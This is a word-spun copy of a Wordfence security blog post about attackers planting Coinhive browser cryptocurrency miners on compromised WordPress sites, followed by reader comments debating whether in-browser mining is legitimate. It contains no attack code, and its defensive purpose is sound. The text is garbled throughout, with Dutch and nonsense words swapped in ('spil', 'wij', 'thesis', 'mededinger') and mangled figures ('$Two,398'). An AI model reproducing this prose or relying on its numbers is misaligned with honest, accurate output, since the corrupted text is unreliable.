Cryptocurrency Miners Exploiting WordPress Sites
During the last month, the information security media has paid a lotsbestemming of attention to cryptocurrency mining malware. The Wordfence team has bot monitoring the situation, and wij are now embarking to see attacks attempting to upload mining malware, and webpagina cleaning customers that are already infected.
Te this postbode, you’ll learn what cryptocurrency mining is, what’s ter it for the attackers, how to check if you have this punt and what to do about it if you do.
Cryptocurrency Mining Attacks on WordPress
For those of you who aren’t up to speed, cryptocurrencies are digital currencies that can act spil an alternative to traditional currencies. Examples include Bitcoin, Litecoin, Ethereum and Monero, among many others. Cryptocurrency mining is a computationally intense process that contributes to the operations of the cryptocurrency network while generating fresh currency. It takes a massive amount of rekentuig resources to generate meaningful income. People interested te cryptocurrency mining generally need to invest ter expensive equipment and solve for the power consumption and fever generated by hardware.
Wij spotted the very first attack on a WordPress webpagina attempting to embed cryptocurrency mining code on September 17. Attack volume has bot very low and unsophisticated so far. However, our Security Services Team is commencing to see hacked websites with this malware, so the attackers are beginning to have some success.
The attacks wij have analyzed are all attempting to exploit well-known security vulnerabilities that have bot around for a long time, for example, the Gravity Forms exploit from mid-2016, or the Joomla com_jce exploit from early 2014. Wij have also seen fairly a few attempts to insert mining code using compromised WordPress administrator accounts, spil well spil some attacks using compromised FTP accounts.
How Attackers Profit From Cryptocurrency Mining Malware
Webpagina owners who place the Coinhive code on their websites earn Monero currency. The Coinhive code uses webpagina visitors’ computational resources to mine Monero. An attacker can place the Coinhive code on thousands of websites and earn Monero from the mining that happens ter webpagina visitors’ browsers.
The following is an example of embedded Coinhive code that will mine Monero currency:
The research team at Checkpoint analyzed the profit potential for an attacker planting this malware. They concluded that an attacker successful enough to average 1,000 mededinger users across all infected sites would generate $Two,398 te monthly revenue.
Wij think thesis attacks will grow ter popularity very quickly given how lucrative they are. Attacks that attempt to embed cryptomining malware are presently unsophisticated, but wij expect to see an increase te the sophistication of attacks spil word gets out that this is a lucrative enterprise. Wij also expect thesis attacks to target higher-traffic websites, since the potential to profit increases greatly with higher numbers of mededinger webpagina visitors.
How to Check if Your Webpagina Is Infected With Cryptocurrency Mining Malware
The Wordfence firewall blocks attacks attempting to infect sites with this malware. Wij have added detection capability to Wordfence for cryptominer scripts. This means that the scanner will warn you if it detects this type of script on your webpagina. It also means that the Wordfence firewall will block any uploads that contain the script.
Wordfence Premium customers presently already have access to this detection capability. Free users will get access to this capability on November 24 via the Community version of the Threat Defense Feed.
It is significant to make sure you detect an infection quickly if an attacker should manage to slip through your defenses. Below is an example of a scan finding that would indicate this infection exists on your webpagina.
Wij have also added detection capabilities to Gravityscan. To run a scan on your webpagina, simply go to the Gravityscan webstek and run a scan. For best results wij recommend that you install the Gravityscan Accelerator.
Below is a scan finding example from Gravityscan.
(If you have intentionally added a cryptominer script to your webpagina, of course, you can simply overlook the finding on either podium.)
Some cryptomining malware may be more hidden or obfuscated, so always pay attention if many of your visitors embark reporting poor spectacle by their browser or rekentuig while visiting your webpagina.
A few hackers have adjusted the miner settings so that it only uses only a portion of the available CPU power, or so that only one example of the miner script can run at a time (even if it’s open te numerous tabs).
But many of them are still set to use 100% of available resources, no matter what.
Switches te Attacker Business Models
Fresh business models are permanently emerging for attackers. Historically, attackers would use compromised websites to generate spam content or spam email. Te the past decade, ransomware has gained popularity among attackers, spil it permits them to extort money from victims. More recently, using stolen computational resources to mine cryptocurrency has emerged spil a way for bad actors to profit from compromised systems.
This emerging business proefje has now made its way into the WordPress ecosystem spil a way for attackers to profit from compromised WordPress websites and the computational resources of webstek visitors. It is imperative that WordPress webpagina owners deploy a firewall and malware scan on their sites to quickly detect this fresh threat and ensure that their webpagina visitors’ resources are not hijacked to mine cryptocurrency.
What to Do If Your Webpagina Is Infected With Cryptocurrency Mining Malware
The most reliable way to recover if your webstek is hacked is to use our webpagina cleaning service. Our team of experts will clean your webpagina and get it back online spil quickly spil possible, and the service includes a detailed report and a 90-day assure. You can also use the Wordfence webpagina security audit to do a comprehensive security inspection of your webstek.
If you choose to attempt to fix any infection yourself, you can go after our guide to fixing a hacked webstek with Wordfence.
Did you love this postbode? Share it!
11 Comments on “Cryptocurrency Miners Exploiting WordPress Sites”
Joe Levi October 26, 2017 at 11:04 am &bull, Reply
It should be noted that Coinhive (and it’s adblocker-friendly authedmine.com) are NOT the problem here. Legitimate sites, faced with declining revenue, have placed Crypominers on their sites to offset this loss of ad revenue. Yes, some hackers are hijacking this, and THAT is bad, but the presence of the code is not an indication of an infection.
Example #1: I have a pagina dedicated to people who want to support my efforts. On that pagina you can make a PayPal donation, click through to Amazon using my affiliate code, and there’s a Coinhive cryptominer there, too. Go take a look: http://www.JoeLevi.com/thanks.html
Example #Two: There is a concept called “proof of work” which essentially runs a pre-determined number of computations. Once that threshold has bot met and submitted, a value is returned. This can be set up to operate spil a Captcha. If someone wants to loom te to your webpagina, just like Google’s “I am not a robot” captcha, this method could be used to incur a compute expense on the pc of the person logging ter. This not only slows down brute-force login attempts on your webpagina, but for a bot that’s brute-forcing to have to spend thousands of compute cycles vanaf login, this zuigeling of captcha can help reduce the influence on OTHER (non-captcha’d) login pages, too.
Te conclusion, there are some very legitimate use-case screenplays which can be employed through this type of technology. Sure, some people are exploiting it, and some people are hijacking. The article doesn’t opoffering this perspective, so I wished to provide this information for the reader’s consideration.
– Joe Levi, Redoubt Solutions, LLC
Security and Information Services
Mark Maunder October 26, 2017 at 11:43 am &bull, Reply
Thanks for your input Joe.
Otto October 26, 2017 at Three:41 pm &bull, Reply
Joe Levi, thesis things could have bot implemented correctly te the very first place. Instead, coin-hive made a rather foolish mistake, and now people are treating it spil malware because that is ter fact the main use of this code. The “legit” cases of coin-hive is less than 1% of the total. People are exploiting it and the bottom line is ordinary: Browser based coin mining is now officially a menace, and it will never be considered te any way legitimate everzwijn again. It will be blocked, it will be incorrectly called a “virus”, and it will be banned ter all possible ways.
It’s dead tech before it even commenced because of this poor, poor implementation.
Joe Levi November Two, 2017 at Ten:59 am &bull, Reply
Otto, I hear what you’re telling, but I’d like to see if I can waterput it te the setting of something wij already know to see if it might switch your opinion.
Today wij have ads on our sites which are delivered by any number of providers. Thesis ads began spil pictures, adding extra load-time and bandwidth to the pages the users’ flow. They didn’t ask for this. They weren’t given the capability to “opt-in”. Their bandwidth wasgoed “stolen”, their compute cycles were “stolen”, and their screen real-estate wasgoed forcefully “occupied” by an ad they didn’t ask for.
What’s worse, since thesis photos were served by other systems (not the webpagina which the user wasgoed visiting), all their IP and header gegevens were available to this 3rd Party – again, without option.
But it wasn’t just pics which were being served. It wasgoed Flash/Shockwave objects, which were mini-programs which could monitor activity on the pagina. Again, without option.
Now, it’s not Flash spil much spil it is IFRAMES – entire web pages with pics, scripts, css, cookies, and more. All this delivered without asking if they can use your bandwidth, your compute cycles, your screen real-estate, or your disc’s storage space.
That’s the state of ads today – but no one seems to care.
Did advertisers make the same “foolish mistake” which you argue Coinhive did by not forcing a pre-load opt-in? Should people treat ad networks spil “malware”, because they, like Coinhive, use your system resources without your explicit authorization? Are people not “exploiting” ad networks now ter the same style which you argue they’re “exploiting” Monero mining?
Aren’t ad networks now a “officially a menace, and it will never be considered ter any way legitimate everzwijn again”, based on the same arguments you made about Coinhive?
Shouldn’t people also want to block ad networks, call ad networks a “virus”, and kerkban them “ter all possible ways”.
Why aren’t ad networks “dead tech before it even commenced because of this poor, poor implementation”?
I ask thesis questions not to argue, but to open the conversation about the resources which are presently being sequestered by ad networks (which nobody seems to care about), and to attempt and determine why that is somehow an acceptable non-optional use of resources, but crypto-mining is somehow not.
– Joe Levi, Redoubt Solutions, LLC
Security and Information Services
Brendon November 1, 2017 at 11:03 am &bull, Reply
If I’m visiting a webstek that has cryptocurrency miners running them, unbeknownst to webpagina visitors, I want to know about it. Sure, you can argue this is another form of advertising spil it generates revenue for sites suffering from ad blocker usage, but IMHO it’s an underhanded method.
Moreover, WordPress sites tend to have a lotsbestemming of embedded code te the pages due to WP add-ons that require it to run. Spil a webstek admin and user, I don’t thinks it’s a good idea to be impacting pagina flow times more with extra pagina code that the browser needs to explosion/interpret.
Ter sum: this is not a best practice.
Justin Germino October 26, 2017 at 11:07 am &bull, Reply
Obviously any hack/exploit is bad, and someone hacking thousands of sites to build up benefit of mining is likely going to go unnoticed longer than a hacked webpagina that redirects or popups spam /malware, so this is a more subtle way of stealing off of other webpagina traffic.
I do think that ter general cryptomining on sites spil a means of revenue may be a good alternative if done legit with disclaimers spil a way to go banner ad free, liquidate advertisements to create alternative revenue source but only for sites you own/manage of course.
Quentin October 26, 2017 at 11:Ten am &bull, Reply
Monero spil a cryptocurrency has a loterijlot of potential and some indeed good tech, and in-browser mining has some legitimate uses. Sad to see it manhandled this way, it gives both browser mining and Monero bad reputations that they don’t deserve. Thanks for adding checks for thesis to the scanner, hopefully with enough alertness and pressure the bad actors will find it too much trouble and budge on to something else.
Ross Heitkamp October 26, 2017 at 11:22 am &bull, Reply
This is good information about a possible fresh hack on our sites. But, since this is indeed “infecting” visitors to sites, I would like to learn more about being able to detect that spil a visitor – not just by noticing higher CPU usage. I often have many tabs open and do sometimes notice my CPU pegged and abandon, but which webpagina should I now avoid? Implements to empower visitors would create a natural boycott to make this unsuccessful.
rfrazier October 26, 2017 at 12:34 pm &bull, Reply
Hi guys. I had uncovered informatie about this coin mining ter browsers becoming a problem te my security research and wasgoed literally just about to write to you all about it today. I’m glad you’re aware of and on top of the problem. Spil a user, I’m very leery of this and have already installed a Firefox plugin to prevent coin mining te my browser. Even if webstek owners intentionally add mining code to their webpagina with the best of intentions, it’s very possible, even likely, that they would get low quality or abusive or even malicious code running on their sites which would harm the users. Spil a user, I MIGHT permit mining on my browser if a) I Truly like the webpagina. b) They give mij superb free content while encouraging mij to provide revenue. c) They get my EXPLICIT permission to mine. d) They Assure where the money goes and honor that. e) They let mij set the max cpu usage vanaf tabulator and vanaf webpagina ter 1 % increments and honor that. f) They let mij determine whether background operation is permitted assuming it’s even possible. g) They permit mij to switch or revoke my permissions at any time and honor that. and h) The use only reputable / credible mining providers. If I clear out my history and cookies (assuming cookies are used) and go back to the webpagina, it should NOT mine, and should get my EXPLICIT permission all overheen again. Note that for many desktop computers ter the continental USA, pegging the cpu will use about 100 W of toegevoegd power and, if done 24 / 7, will cost about $ 7 / month reserve on your electrified bill. This obviously depends on the pc, and the electrified billing rate. Note also that pegging the cpu will cause your rekentuig spectacle and responsiveness to go down the drain.
Thanks for all the good work you all do.
Jarrod October 27, 2017 at Four:08 am &bull, Reply
I agree with Joe. He summed it up right there.
Wil November Two, 2017 at 7:44 pm &bull, Reply
I’m also intrigued to see where this goes spil regards to bad actors manhandling a legitimate service.
I find that the Chrome extension minerBlock is working well at detecting pages that are running thesis mining scripts. Toevluchthaven’t detected a entire lotsbestemming just now, but they are certainly out there.
Good to hear that Wordfence is now scanning for thesis.
Protect your websites with the #1 WordPress Security Plugin
Overheen 50 million downloads
Get the latest WordPress security updates and news
Sign up for WordPress security alerts, Wordfence product updates and security news via email.